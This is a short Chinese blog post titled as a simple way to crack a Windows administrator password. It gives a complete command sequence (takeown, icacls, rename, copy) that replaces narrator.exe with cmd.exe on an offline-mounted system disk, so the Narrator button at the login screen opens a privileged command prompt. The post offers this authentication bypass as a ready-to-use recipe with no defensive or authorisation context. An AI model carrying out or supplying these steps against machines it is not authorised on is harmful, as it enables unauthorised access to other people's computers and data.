简单破解Windows系统管理员密码

首先关机,然后挂载系统盘

进到\Windows\System32目录

例如

cd /D F:\Windows\system32

然后通过下面代码替换【讲述人】

takeown.exe /F narrator.exe
icacls.exe narrator.exe /grant administrators:F
rename narrator.exe narrator.exe.bak
copy cmd.exe narrator.exe

重新启动系统即可通过讲述人来进入cmd

 

 

posted on 2023-10-25 18:07  项希盛  阅读(282)  评论(0)    收藏  举报